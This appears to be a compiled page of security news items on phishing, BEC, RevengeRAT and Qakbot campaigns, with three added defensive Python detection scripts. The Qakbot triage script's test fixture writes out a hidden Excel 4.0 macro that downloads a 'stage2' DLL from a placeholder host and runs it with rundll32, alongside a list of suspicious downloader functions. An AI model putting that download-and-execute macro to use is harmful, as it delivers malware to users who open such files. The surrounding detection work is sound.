
Driver's License Exploitation Scams Surge

 

The Covid-19 pandemic has given cybercriminals a ripe opportunity: they are exploiting the confusion around expired driver's licenses to phish targeted individuals for their personal information. 

According to Stateline, the phishing scams exploit the fact that several states issued emergency declarations allowing driver's licenses to remain valid beyond their expiration dates. As those extensions lapse, drivers must now renew their licenses, and scammers are taking full advantage of that shift, Stateline reports. 

In conventional phishing, cybercriminals send malicious links or attachments via email and victims click on them. When fraudsters use text messages instead, the technique is known as "SMS phishing" or "smishing." 

According to state motor vehicle agencies, driver's license phishing scams, which attempt to steal identities and personal information, have already been sprouting up across the United States. Iowa, Minnesota, Ohio, Vermont, and Wyoming are among the states in which the scams have been detected so far. 

Scam artists send out text messages or emails falsely claiming that the target's license needs an urgent update because some information is missing, or that it is about to expire and will be invalid within a few days. When the recipient clicks the link, a Google Form often opens requesting personally identifiable information such as a Social Security number and date of birth. 

“It’s despicable,” said David Druker, a spokesperson for the Illinois secretary of state’s office, which issues driver’s licenses. “It’s just outrageous that when the country is going through the COVID crisis, people are taking the time and energy to steal information from others.” 

According to Druker, a large number of people in Illinois received texts and emails from fraudsters posing as the secretary of state or as employees of the state transportation department. Druker added that he did not know whether anyone had fallen for the ruse. 

Upon learning of the phishing and smishing, Illinois officials notified the FBI and IRS, which worked with Google to remove the bogus webpages. According to Druker, the authorities have discovered 1,035 sites so far, and Google has taken down nearly 900 of them. 

According to a notice issued earlier this month by the U.S. Department of Health and Human Services' Office of Inspector General, fraudsters are now using door-to-door visits, telemarketing calls, text messages, and social networking sites to conduct COVID-19-related frauds. 

“Do not provide personal, medical, or financial details to anyone in exchange for vaccine information, and obtain vaccinations from trusted providers,” the Office of Inspector General urges. 

“Posting content that includes your date of birth, health care details, or other personally identifiable information can be used to steal your identity,” said the Inspector General’s office.

Experts Discover Prometheus TDS, an Underground MaaS

 

Cybersecurity experts from Group-IB, in their technical research on Prometheus TDS, an underground MaaS (malware-as-a-service) offering, found that it has been used to distribute malware families including Campo Loader, Buer Loader, Qbot, Hancitor, IcedID, and SocGholish. Prometheus has been advertised aggressively on underground forums since last year. The platform bundles email sending, social engineering lures and traffic filtering; its TDS (Traffic Direction System) component also handles web shell deployment, creation and management of redirects, proxying of traffic, integration with Google accounts, and checks of the operator's infrastructure against blacklists. 

Security Week reports that a "typical attack involving Prometheus TDS starts with a malicious email that either carries an HTML file to redirect the victim to a compromised site, or a link to a web shell that performs a redirection. Once the victim follows the link, they are redirected to the Prometheus.Backdoor URL where their data is collected and sent to the Prometheus TDS admin panel, which decides how to serve the next stage." The service is rented for $250 per month. Besides distributing malicious files, the TDS is also used to redirect victims to malicious and phishing sites. 

The first Prometheus TDS campaigns were identified in 2021, along with additional active campaigns, and more than 3,000 targeted addresses have been found to date. The TDS includes an administrator panel that lets operators configure campaign parameters, including which malicious file is served and restrictions by geolocation, operating system and browser. Compromised third-party sites act as an intermediary between victims and the administrative panel; on one of these sites, experts found a PHP backdoor file named 'Prometheus'. 

The backdoor collects visitor data and transmits it to the panel. "The service has been used to send malicious emails to more than 3,000 addresses to date. The most active campaign targeted individuals in Belgium (more than 2,000 emails), while the second largest attack targeted US entities (more than 260 emails targeting government agencies and organizations in sectors such as finance, insurance, healthcare, energy and mining, retail, IT, and cybersecurity)," Security Week reported.

Crime-as-a-Service Makes Advanced Phishing Attacks Easier For Amateurs

 

CaaS (crime-as-a-service) is a practice in which experienced criminals sell the tools and know-how required to commit a cybercrime. One of its most common uses is phishing, which remains one of the easiest ways for an attacker to break into an organization. Previously, a phishing attack required an experienced threat actor's technical proficiency and knowledge of social engineering; with the rise of CaaS, anyone with no prior knowledge of cyberattacks can launch one. 

CaaS provides an amateur attacker with everything required to run a personal phishing attack, from branded email templates to detailed target lists. Attackers can also pay for already compromised servers, which reduces the chance of the attack being traced back to them. By lowering the risk of getting caught, the trend has made it simple to carry out a cyberattack, and a serious problem for the organizations being targeted. CaaS also offers technical advantages: with downloaded templates, novice attackers can craft messages that reliably land in employees' inboxes. 

These kits use evasion methods such as inspection blocking, content encryption, and URLs hidden inside attachments to avoid detection, which lets unskilled attackers perform advanced attacks and has become a serious issue for organizations. Besides being easy to execute, phishing campaigns are also highly effective. Phishing attacks carried out with CaaS tools are built to target employees directly, which makes them hard for organizations to defend against. The attacker uses social engineering techniques to exploit end users, gaining their trust and creating a sense of urgency to respond. 

Attackers can use open-source intelligence, gathering data from organization websites, past breaches, and social media, to run successful spear-phishing campaigns. HelpNetSecurity says "Crime-as-a-Service has made phishing an even more attractive method of attack for cybercriminals, by making it more accessible and less labor-intensive. Why spend months looking for an organization's security vulnerabilities when you can hit them with a ready-made phishing attack? It's also made phishing campaigns more easily scalable because it takes criminals less time and effort to execute their attacks."

Chipotle's Email Marketing Account Compromised to Spread Malware

 

In mid-July, a new phishing campaign was detected that used a compromised email marketing account. In the four days between July 13 and July 16, 2021, anti-phishing company Inky uncovered 121 phishing emails in this campaign. 

In May 2021, Nobelium (the group suspected of being behind the SolarWinds attack) used a similar method. Microsoft reported in May on a Nobelium campaign in which fraudulent emails were delivered to 3,000 accounts across 150 companies in 24 countries. All of the fraudulent emails were sent through the Constant Contact mailing service, using the hacked account of the US Agency for International Development (USAID). 

Inky, the anti-phishing firm that identified the new campaign, notes that the 121 emails it saw are likely a small fraction of the overall number sent. Inky states in its report that it is examining whether the current campaign was initiated by the same threat actor or by copycat criminals using the same approach as Nobelium. 

The method involves compromising a legitimate customer account at a mail service provider. In this case the account belonged to Chipotle, the fast-food chain, and the provider was Mailgun. Because the emails genuinely originate from a high-reputation source, the approach has a high success rate. 

Since the emails come from a high-reputation IP address (Mailgun: 166.78.68.204) and pass SPF and DKIM authentication (the messages really were sent through Mailgun on behalf of chipotle.com), they clear many automated phish detection systems. 

Of the 121 phishing emails discovered, two were vishing lures (phony voicemail alerts with malware attachments), 14 impersonated USAA Bank, and 105 impersonated Microsoft. Inky does not specify what malware was used in the vishing attacks, nor does it name the firms that were phished. 

In the 14 USAA impersonations, a mail.chipotle[.]com link led to a fraudulent USAA Bank credential-harvesting site. The site is a convincing copy of the legitimate bank site, complete with the USAA logo. 

The researchers commented, “The black hats can make these pages by simply cloning the real page, changing just one or two details to the underlying HTML, and voila! A credential-harvesting page is born.” 

The majority of the phishing emails masquerade as Microsoft. This is predictable, given that nearly everyone has a Microsoft account, and those accounts typically hold a wealth of information (other logins, trade secrets, financial details, and more). 

In the sample presented by Inky, the email is sent by 'Microsoft 365 Message Center' and the subject reads, "You have (7) clustered/undelivered emails 16 July 2021." This should not mislead an informed user who wonders why Microsoft would send email through a fast-food chain, but it may deceive automated detection systems that depend largely on sender reputation. 

The email's body is a classic fraud trap. Seven emails for the target have been held up due to storage difficulties, but are now ready for collection (the curiosity trigger). Ignoring the notification may result in the account being disabled (the fear trigger). Then there's a button that says "Release messages to the inbox." Clicking it sends the user to a fake Microsoft login page that harvests credentials. 

The key to identifying this sort of phishing email is the mismatch between the sender's display name (here Microsoft, USAA, or VM Caller ID) and the actual sending address (here postmaster[@]chipotle[.]com): the former would never send email from the latter. Secure email gateways, on the other hand, frequently check only whether the sending domain is authenticated and whether the mail comes from an approved range of IP addresses.
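The check described above can be automated. The following Python script is an added example, not Inky's code or anything from the original post: it parses a message, extracts the display name, the From domain, the Return-Path domain and the Authentication-Results verdicts, and flags a display name that claims a brand the sending domain is not allowed to send for, even when SPF and DKIM pass. The two messages it runs on are constructed to match the campaign description (the Mailgun IP and the postmaster@chipotle.com sender come from the report; the other header values and the BRAND_DOMAINS allow-list are assumptions).

```python
"""Display-name vs. real-sender check for mail relayed through a legitimate ESP."""
import email
import re
from email.utils import parseaddr

# Brands a display name may claim, mapped to domains that may legitimately send for them.
# Assumption: a defender-maintained allow-list; these two entries are illustrative only.
BRAND_DOMAINS = {
    "microsoft": {"microsoft.com", "microsoftonline.com"},
    "usaa": {"usaa.com"},
}


def auth_results(msg):
    """Pull the spf/dkim/dmarc verdicts out of Authentication-Results, if present."""
    hdr = msg.get("Authentication-Results", "")
    verdicts = {}
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", hdr, re.IGNORECASE)
        verdicts[mech] = m.group(1).lower() if m else None
    return verdicts


def domain_of(addr):
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def analyze(raw):
    """Flag messages whose display name claims a brand the sending domain cannot vouch for."""
    msg = email.message_from_string(raw)
    display, from_addr = parseaddr(msg.get("From", ""))
    from_dom = domain_of(from_addr)
    _, rp_addr = parseaddr(msg.get("Return-Path", ""))
    rp_dom = domain_of(rp_addr)
    auth = auth_results(msg)
    claimed = [b for b in BRAND_DOMAINS if b in display.lower()]
    findings = []
    for brand in claimed:
        if from_dom not in BRAND_DOMAINS[brand]:
            findings.append(f"display name claims {brand!r} but the From address is in {from_dom}")
    if rp_dom and rp_dom != from_dom:
        findings.append(f"Return-Path domain {rp_dom} differs from From domain {from_dom}")
    if findings and auth["spf"] == "pass" and auth["dkim"] == "pass":
        # The gateway's authentication checks are not wrong; they just vouch for the wrong thing.
        findings.append(f"SPF/DKIM pass only vouches for {from_dom}, not for the claimed brand")
    return {
        "display_name": display,
        "from_domain": from_dom,
        "auth": auth,
        "claimed_brands": claimed,
        "findings": findings,
        "verdict": "suspicious" if findings else "ok",
    }


# Constructed messages modelled on the campaign described above; not real captures.
PHISH = """\
Return-Path: <postmaster@chipotle.com>
Received: from relay.example.invalid ([166.78.68.204]) by mx.example.net
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=chipotle.com; dkim=pass header.d=chipotle.com
From: "Microsoft 365 Message Center" <postmaster@chipotle.com>
To: employee@example.net
Subject: You have (7) clustered/undelivered emails 16 July 2021

Release messages to the inbox.
"""

LEGIT = """\
Return-Path: <bounce@microsoft.com>
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=microsoft.com; dkim=pass header.d=microsoft.com
From: "Microsoft account team" <noreply@microsoft.com>
To: employee@example.net
Subject: Your sign-in activity

Hello.
"""

if __name__ == "__main__":
    for label, sample in (("phish", PHISH), ("legit", LEGIT)):
        result = analyze(sample)
        print(label, result["verdict"], *result["findings"], sep="\n  ")
```

A gateway that trusts sender reputation alone treats the passing SPF/DKIM result as the end of the story; the point of the extra check is that authentication vouches for chipotle.com, and nobody at chipotle.com should be sending Microsoft account notices.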

Oil & Gas Targeted in Year-Long Cyber-Espionage Campaign

 

A sophisticated campaign aimed at large multinational oil and gas firms has been running for more than a year, spreading commodity remote access trojans (RATs) for cyber-espionage purposes, according to researchers. 

According to Intezer's analysis, spear-phishing emails are used to deploy malware such as Agent Tesla, AZORult, Formbook, Loki, and Snake Keylogger on victims' computers, all with the goal of stealing confidential data, banking information, and browser data, as well as logging keystrokes. 

While energy corporations are the primary targets, the campaign has also hit a few companies in the IT, industrial, and media sectors, the researchers say. Its targets are mainly based in South Korea, but also include companies in the United States, the United Arab Emirates, and Germany. 

The report states, “The attack also targets oil and gas suppliers, possibly indicating that this is only the first stage in a wider campaign. In the event of a successful breach, the attacker could use the compromised email account of the recipient to send spear-phishing emails to companies that work with the supplier, thus using the established reputation of the supplier to go after more targeted entities.” 

One of the media targets stands out. According to Intezer, "The company is FEBC, a religious Korean Christian radio broadcaster that reaches other countries outside of South Korea, many of these countries which downplay or ban religion. One of FEBC's goals is to subvert the religion ban in North Korea." 

Modus Operandi of the Attack:

According to the analysts, the attackers launch the attack by sending emails tailored to the staff of each targeted company. The recipient addresses range from generic (info@targetcompany[.]com, sales@targetcompany[.]com) to specific individuals inside the organization, implying varying levels of reconnaissance. 

The addresses in the "From" field are typosquatted or spoofed to create an impression of authenticity: they are designed to look like emails from real organizations that the targets already know. Typosquatting fools recipients into believing an email was sent from a trusted entity. 

“The contents and sender of the emails are made to look like they are being sent from another company in the relevant industry offering a business partnership or opportunity,” according to Intezer. 

Other attempts to appear legitimate include references to executives and the use of the physical addresses, logos, and email addresses of genuine organizations in the body of the emails. According to the post, the emails also contain requests for quotes (RFQs), contracts, and referrals or tenders for genuine projects related to the targeted company's business. 

The attachment in most of these emails has a file name and icon that make it look like a PDF. Intezer's researchers stated that the goal is to make the file appear less suspicious and entice the target to open it. An information stealer executes when the victim opens the attachment and clicks on the files it contains. 

Intezer also noted that the malware's execution is fileless: it is loaded into memory without writing a file to disk, in order to avoid detection by conventional antivirus. 

A Social-Engineering Bonanza: 

According to the experts, while the technical parts of the operation are fairly standard, the attackers excel at social engineering and at researching their targets. 

One email, for example, claimed to come from Hyundai Engineering and referred to a real combined-cycle power plant project in Panama. It instructs the recipient to submit a bid for the project's equipment supply and says that further details and requirements are "in the attached file" (which contains the malware). The message also specifies a firm deadline for proposal submissions. 

Another email examined by Intezer was sent to an employee of GS E&C, a Korean contractor involved in a number of power plant projects worldwide. It requested both technical and commercial proposals for the goods listed in the attachment, ostensibly a material take-off (MTO) document. 

Researchers stated, “The content of the emails demonstrates that the threat actor is well-versed in business-to-business (B2B) correspondence. This extra effort made by the attacker is likely to increase the credibility of the emails and lure victims into opening the malicious attachments.”

Israeli Chief-of-Staff was Hacked by an Iranian State-Sponsored Cybercriminal

 

According to the Times of Israel, an Iranian hacker targeted the computer of a former IDF chief of staff and gained access to its entire contents. Channel 10 identified the hacker as Yaser Balaghi. After the hack, he allegedly bragged about it, unwittingly leaving a trail to his identity. That slip forced Iran to shut down a cyber operation that had targeted 1,800 people around the world, including Israeli army generals, Persian Gulf human rights campaigners, and academics. 

The Times of Israel was the first to report on the operation after Check Point, an Israeli cybersecurity firm, confirmed its existence two weeks ago; Check Point's findings also featured in Tuesday's Channel 10 report. The attack began two months earlier, according to Gil Shwed, CEO of Check Point Software Technologies, who told Israel Radio in late January that targets received email messages designed to install malware on their computers. More than a quarter of those who received the emails clicked on them, unknowingly downloading spyware that let the hackers steal data from their hard drives. 

Israel has been the target of several cyberattacks in the last two years, and officials say some of the infiltration attempts were carried out by hackers linked to Hezbollah and the Iranian government. 

Late in January, Israel's Electric Authority was the target of a significant cyberattack, according to Energy Minister Yuval Steinitz, who did not say where the attack originated. ClearSky, an Israeli cybersecurity firm, said in June that it had detected a continuous wave of cyberattacks emanating from Iran against targets in Israel and the Middle East, with Israeli generals once again among the targets. The firm believes the goal is espionage or other nation-state objectives. 

According to ClearSky, the hackers use targeted phishing to gather user identity data by creating phony websites that appear legitimate and trustworthy. They succeeded in penetrating 40 targets in Israel and 500 worldwide. Retired generals, employees of security consultancies, and academic experts were among the targets in Israel.

Pay Attention: These Unsubscribe Emails Only Lead to Further Spam

 

Scammers send out fake 'unsubscribe' spam emails to validate legitimate email addresses for future phishing and spam campaigns. 

Spammers have long sent emails that merely ask whether the user wants to unsubscribe or subscribe. These emails don't specify what the user is unsubscribing from or subscribing to; spammers use them to check whether the recipient's address is real and therefore a viable target for phishing and other nefarious activity. 

If they get the confirmation they need, they will bombard the address with spam. The campaign is simple: the victim receives a basic email with a call to action asking whether they want to unsubscribe or subscribe: 

“Please confirm your Subscribe (sic) or Unsubscribe. Confirm Subscribe me! Unsubscribe me! Thank you!” 

The embedded subscribe/unsubscribe links are mailto: links, so clicking one makes the mail client generate a new message addressed to a large number of different addresses controlled by the spammer. 

After sending that message, users expect to be unsubscribed from future communications; instead, they have confirmed to the spammers that their email address is real and actively monitored. 

BleepingComputer tested this with a new email account that had never been used on any website or service. They replied from the new account to several of these confirmation emails that had been received at a different address. Within a few days, the new account was being bombarded with spam. 

The test confirms that spammers are using these subscribe/unsubscribe emails to refine their mailing lists and validate addresses that are open to phishing and fraud. 

These attacks are not restricted to spam: nothing stops scammers from following up with phishing or social engineering against the confirmed address, which is often more dangerous and harder to detect and stop. 

Security experts advise users never to click links in an email unless they are fully certain of the sender's legitimacy and the link's destination. No credible company will send an email offering only the options "Subscribe or Unsubscribe" with no other information.

RevengeRAT is Targeting the Aerospace and Travel Sectors with Spear-Phishing Emails

 

Microsoft has issued a warning about a remote access trojan (RAT) called RevengeRAT, which it says is being delivered through spear-phishing emails aimed at the aerospace and travel industries.

RevengeRAT is a remote access trojan classified as a high-risk infection. It gives cybercriminals remote access to infected computers so they can control them. According to research, cybercriminals spread it through spam email campaigns (malicious MS Office attachments). Having a trojan such as RevengeRAT on a device can cause a slew of problems. 

Operators can use RevengeRAT to monitor system services, processes and files, edit the Windows Registry and hosts file, log keystrokes, steal account passwords, access hardware such as the webcam, run shell commands, and so on. As a result, they have the potential to cause serious harm. 

RevengeRAT and a second RAT, AsyncRAT, are spread by carefully crafted email messages that instruct recipients to open what appears to be an Adobe PDF attachment but which actually delivers a malicious VBScript file. 

Security company Morphisec recently identified the two RATs as payloads of a sophisticated crypter-as-a-service that delivers multiple RAT families. According to Microsoft, the phishing emails deliver a loader, which in turn drops RevengeRAT or AsyncRAT. Morphisec says the service is also able to deliver Agent Tesla. 

"The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads," Microsoft said. 

Morphisec named the crypter service "Snip3" after a username it found in earlier malware variants. If Snip3 detects that it is running inside Windows Sandbox, a virtual machine security feature Microsoft launched in 2018, it will not load the RAT. Advanced users can use Windows Sandbox to run potentially malicious executables in an isolated environment that won't harm the host operating system.

"If configured by [the attacker], the PowerShell implements functions that attempt to detect if the script is executed within Microsoft Sandbox, VMWare, VirtualBox, or Sandboxie environments," Morphisec notes. "If the script identifies one of those virtual machine environments, the script terminates without loading the RAT payload."

Fake Chrome App is Being Used as Part of a Cyberattack Campaign

 

According to researchers at cybersecurity company Pradeo, a newly discovered Android malware impersonates the Google Chrome app and has already infected hundreds of thousands of smartphones. The researchers have labeled the threat a "Smishing Trojan." 
 
According to the researchers, the fake Google Chrome app is part of a mobile attack campaign that uses phishing to steal credit card information. Installing the fake app also makes the device part of the campaign's distribution infrastructure. 

“The malware uses victims’ devices as a vector to send thousands of phishing SMS. We evaluate that the speed at which it is spreading has enabled it to already target hundreds of thousands of people in the last weeks. ”, said the researchers in their ‘Security Alert’ post on their website. 

The attack begins with a simple smishing gambit, according to Pradeo: targets receive an SMS telling them to pay "custom fees" to release a package delivery. If they tap the link, a message tells them the Chrome app needs to be updated. If they accept, they are directed to a malicious website hosting the phony app, which is in fact the malware being downloaded onto their phones. 

After the supposed "update," victims are directed to a phishing page that completes the social engineering: according to the report, they are asked to pay a small sum (usually $1 or $2), a less-is-more strategy that is of course just a front for collecting credit card details.

“Attackers know that we’re accustomed to receiving alerts of all types on our smartphones and tablets,” Hank Schless, senior manager of security solutions at Lookout said. “They take advantage of that familiarity to get mobile users to download malicious apps that are masked as legitimate ones.” 

The campaign is especially risky, according to Pradeo, because it combines an effective phishing tactic, self-propagating malware, and multiple bypasses of security solutions. "The attack could be the work of a regular level but very ingenious cybercriminal," Pradeo's Roxane Suau said. "All the techniques (code concealment, smishing, data theft, repackaging…) used separately are not advanced, but combined they create a campaign that is hard to detect, that spreads fast and tricks many users."

Microsoft Detected a BEC Campaign Targeted at More than 120 Organizations

 

Microsoft discovered a large-scale business email compromise (BEC) campaign that hit over 120 organizations and used typosquatted domains registered only days before the attacks began. Cybercriminals continue to target companies in order to trick recipients into paying bogus fees, transferring money or, in this case, buying gift cards. This kind of attack, known as business email compromise (BEC), is a dangerous form of phishing aimed at gaining access to sensitive business data or extorting money through email-based fraud.

In this operation, Microsoft found that the attackers used typosquatted domains to make emails appear to come from legitimate senders in the consumer products, process manufacturing, agriculture, real estate, discrete manufacturing, and professional services industries. 

BEC emails are deliberately crafted to look like ordinary messages from someone the intended recipient already knows, but these campaigns are much more complex than they appear: they require planning, staging, and behind-the-scenes activity. 

"We observed patterns in using the correct domain name but an incorrect TLD, or slightly spelling the company name wrong. These domains were registered just days before this email campaign began," the Microsoft 365 Defender Threat Intelligence Team said. 

Despite the scammers' best efforts, Microsoft found that "the registered domains did not always comply with the company being impersonated in the email." The attackers' reconnaissance was nevertheless evident: they addressed targeted employees by their first names, even though their methodology was at times sloppy. 

To lend authenticity to the phishing emails, the scammers used common phishing tactics including fake replies (made more convincing by also spoofing the In-Reply-To and References headers), according to Microsoft.

 
"Filling these headers in made the email appear legitimate and that the attacker was simply replying to the existing email thread between the Yahoo and Outlook user," Microsoft added. "This characteristic sets this campaign apart from most BEC campaigns, where attackers simply include a real or specially crafted fake email, adding the sender, recipient, and subject, in the new email body, making appear as though the new email was a reply to the previous email." 

Though the tactics used by these BEC scammers seem crude and their phishing messages look clearly malicious, BEC attacks have caused record-breaking financial losses every year since 2018. The FBI formed a Recovery Asset Team in 2018 to retrieve money that can still be traced and to freeze accounts used by fraudsters for illegal BEC transactions.
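Two of the tell-tales in this campaign, and in the oil-and-gas spear-phishing described earlier on this page (typosquatted From addresses), lend themselves to simple checks. The Python below is an added example written for this page, not Microsoft's or Intezer's code: it classifies a sender domain against the domains an organization actually corresponds with (exact match, same label with a wrong TLD, a one-character misspelling, or the brand buried in a longer label) and inspects In-Reply-To/References against the Message-IDs the mailbox really sent. The lure, the contoso.com domain and the Message-IDs are constructed, and the domain splitter assumes single-label TLDs.

```python
"""Lookalike sender-domain and forged-thread checks for BEC triage."""
import email
import re
from email.utils import parseaddr


def levenshtein(a, b):
    """Plain edit distance; cheap enough for second-level labels."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def split_domain(domain):
    """Return (second-level label, tld). Assumption: no multi-part public suffixes such as co.uk."""
    parts = domain.lower().strip().split(".")
    return (parts[-2], parts[-1]) if len(parts) >= 2 else (parts[0], "")


def classify_domain(domain, legit_domains, max_dist=1):
    """Match a sender domain against the domains we genuinely correspond with."""
    label, tld = split_domain(domain)
    for legit in legit_domains:
        l_label, l_tld = split_domain(legit)
        if (label, tld) == (l_label, l_tld):
            return "legit", legit
        if label == l_label:
            return "wrong-tld", legit           # contoso.co standing in for contoso.com
        if levenshtein(label, l_label) <= max_dist:
            return "misspelling", legit         # cont0so.com, contsoo.com
        if l_label in label:
            return "brand-in-label", legit      # contoso-invoices.com
    return "unrelated", None


MSGID = re.compile(r"<[^>]+>")


def thread_check(msg, sent_message_ids):
    """Detect forged replies: thread headers that point at messages we never sent, or a
    'Re:' subject with no thread headers at all (the quoted-in-the-body variant)."""
    refs = set(MSGID.findall(msg.get("In-Reply-To", "") + " " + msg.get("References", "")))
    subject = msg.get("Subject", "").strip().lower()
    if not refs:
        return "fake-quoted-reply" if subject.startswith("re:") else "not-a-reply"
    return "forged-thread" if refs.isdisjoint(sent_message_ids) else "thread-ok"


def analyze_bec(raw, legit_domains, sent_message_ids):
    msg = email.message_from_string(raw)
    _, from_addr = parseaddr(msg.get("From", ""))
    domain = from_addr.rsplit("@", 1)[-1] if "@" in from_addr else ""
    kind, mimics = classify_domain(domain, legit_domains)
    thread = thread_check(msg, set(sent_message_ids))
    suspicious = (kind in ("wrong-tld", "misspelling", "brand-in-label")
                  or thread in ("forged-thread", "fake-quoted-reply"))
    return {"from_domain": domain, "domain_class": kind, "mimics": mimics,
            "thread": thread, "verdict": "suspicious" if suspicious else "ok"}


# Constructed lure modelled on the campaign above. contoso.com is a placeholder company domain;
# the Message-IDs are made up. Nothing here is a real capture.
LURE = """\
From: "Pat Rivera" <pat.rivera@contoso.co>
To: alex@contoso.com
Subject: Re: Quick favour - gift cards for the team
In-Reply-To: <20210401120000.ABC123@contoso.com>
References: <20210401120000.ABC123@contoso.com>
Message-ID: <9f1c@contoso.co>

Hi Alex, as discussed, please pick up the gift cards today and send me the codes.
"""
# Message-IDs the victim's mailbox actually sent (constructed); none match the lure's thread headers.
SENT_IDS = {"<20210330090000.real001@contoso.com>"}

if __name__ == "__main__":
    print(analyze_bec(LURE, ["contoso.com"], SENT_IDS))
```

The thread check needs a record of outbound Message-IDs, which most mail servers already keep in their logs; the domain check needs nothing more than the list of domains the business really exchanges mail with, which is exactly what an attacker registering a lookalike days before the campaign cannot be on.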

Qakbot Malware is Targeting the Users Via Malicious Email Campaign

 

Qakbot, also known as QBot or Pinkslipbot, is a banking trojan that has been active since 2007. It has mainly been used by financially motivated actors; it started out as a banking trojan and loader that fetches payloads from C2 servers, but over time its role has expanded well beyond banking fraud. 

Security researchers at Alien Labs have noticed a newly emerged campaign in which victims are targeted with malicious email lures that appear to be in response to, or modified versions of, legitimate business communications between two parties. 

The use of an existing legitimate email, aside from making the lure appear far more convincing to a recipient recognizing their own message and possibly the purported sender, is consistent with previously identified Qakbot behavior in which email accounts are compromised and message threads hijacked. This tactic effectively creates a 'snowball effect' in which more and more organizations can be targeted with lures derived from legitimate email messages obtained from previously compromised victims.

When opened, the malicious Office document poses as a DocuSign file (DocuSign being popular software for signing digital documents). The documents use Excel 4.0 macros (XLM macros) stored in hidden sheets to download the Qakbot second-stage payload from servers compromised by the criminals. 

Before executing the main payload, the Qakbot loader first checks whether the infected system is a good candidate for infection: it determines whether it is running on a virtual machine and looks for installed and running security and monitoring tools, such as antivirus products or common security-researcher tools. 

To make detection and analysis harder, QakBot encrypts its strings and decrypts them at runtime before use. Once the QakBot execution logic is finished using a string, it will immediately delete the string from memory. The hallmarks of a QakBot infection chain consist of a phishing lure (T1566) delivered via email chain hijacking or spoofed emails that contain context-aware information such as shipping, work orders, urgent requests, invoices, claims, etc. The phishing emails alternate between file attachments (T1566.001) and links (T1566.002). QakBot is often used as a gateway entry, similar to TrickBot or Emotet, that leads to post-exploitation operations leveraging frameworks such as Cobalt Strike as well as delivering Ransomware.
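As an added example (not Alien Labs' code or a sample from the campaign), the Python below does static triage of an Office Open XML workbook for the indicators named above: the presence of Excel 4.0 macrosheets, sheets marked hidden or veryHidden, Auto_Open defined names, and downloader-style functions such as CALL and EXEC in the macro formulas. The workbook it scans is built in memory to mimic the DocuSign lure; the sheet names, the URL and the file paths in it are made up, and the list of suspicious functions is a starting point rather than a complete one.

```python
"""Static triage of an Office Open XML workbook for Excel 4.0 (XLM) macro indicators."""
import io
import zipfile
import xml.etree.ElementTree as ET

MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
XM_NS = "http://schemas.microsoft.com/office/excel/2006/main"
# XLM functions that show up in downloader macrosheets. Assumption: a starter list, not exhaustive.
SUSPICIOUS_FUNCS = ("CALL(", "EXEC(", "REGISTER(", "URLDOWNLOADTOFILE", "FORMULA(", "RUN(")


def scan_workbook(blob):
    """Return the XLM-related indicators found in a workbook given as bytes."""
    z = zipfile.ZipFile(io.BytesIO(blob))
    names = set(z.namelist())
    # Excel stores Excel 4.0 macro sheets under xl/macrosheets/, separate from ordinary worksheets.
    macrosheets = sorted(n for n in names if n.startswith("xl/macrosheets/") and n.endswith(".xml"))
    hidden, auto_names = [], []
    if "xl/workbook.xml" in names:
        wb = ET.fromstring(z.read("xl/workbook.xml"))
        for sheet in wb.iter(f"{{{MAIN_NS}}}sheet"):
            if sheet.get("state") in ("hidden", "veryHidden"):
                hidden.append(sheet.get("name"))
        for dn in wb.iter(f"{{{MAIN_NS}}}definedName"):
            # Auto_Open / Auto_Close defined names make Excel run the macro without user interaction.
            if (dn.get("name") or "").lower().endswith(("auto_open", "auto_close", "auto_activate")):
                auto_names.append(dn.get("name"))
    calls = set()
    for ms in macrosheets:
        root = ET.fromstring(z.read(ms))
        for f in root.iter(f"{{{MAIN_NS}}}f"):
            formula = (f.text or "").upper()
            calls.update(fn for fn in SUSPICIOUS_FUNCS if fn in formula)
    has_vba = "xl/vbaProject.bin" in names
    score = (int(bool(macrosheets)) + int(bool(hidden) and bool(macrosheets))
             + int(bool(auto_names)) + int(bool(calls)) + int(has_vba))
    return {"macrosheets": macrosheets, "hidden_sheets": hidden, "auto_open_names": auto_names,
            "suspicious_calls": sorted(calls), "has_vba": has_vba, "score": score}


def build_sample(with_macro=True):
    """Constructed workbook mimicking the DocuSign-themed lure: a visible decoy sheet plus, when
    with_macro is set, a veryHidden macrosheet wired to Auto_Open. Not a sample from the campaign."""
    sheets = '<sheet name="DocuSign" sheetId="1" r:id="rId1"/>'
    defined = ""
    if with_macro:
        sheets += '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>'
        defined = '<definedNames><definedName name="_xlnm.Auto_Open">Macro1!$A$1</definedName></definedNames>'
    workbook = (f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                f'<workbook xmlns="{MAIN_NS}" xmlns:r="{REL_NS}"><sheets>{sheets}</sheets>{defined}</workbook>')
    macrosheet = (
        f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<xm:macrosheet xmlns="{MAIN_NS}" xmlns:xm="{XM_NS}"><sheetData>'
        '<row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
        '"https://example.invalid/stage2","C:\\Users\\Public\\stage2.dll",0)</f></c></row>'
        '<row r="2"><c r="A2"><f>EXEC("rundll32.exe C:\\Users\\Public\\stage2.dll,DllRegisterServer")</f></c></row>'
        '<row r="3"><c r="A3"><f>HALT()</f></c></row>'
        '</sheetData></xm:macrosheet>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/worksheets/sheet1.xml", f'<worksheet xmlns="{MAIN_NS}"><sheetData/></worksheet>')
        if with_macro:
            z.writestr("xl/macrosheets/sheet1.xml", macrosheet)
    return buf.getvalue()


if __name__ == "__main__":
    print("lure :", scan_workbook(build_sample(True)))
    print("clean:", scan_workbook(build_sample(False)))
```

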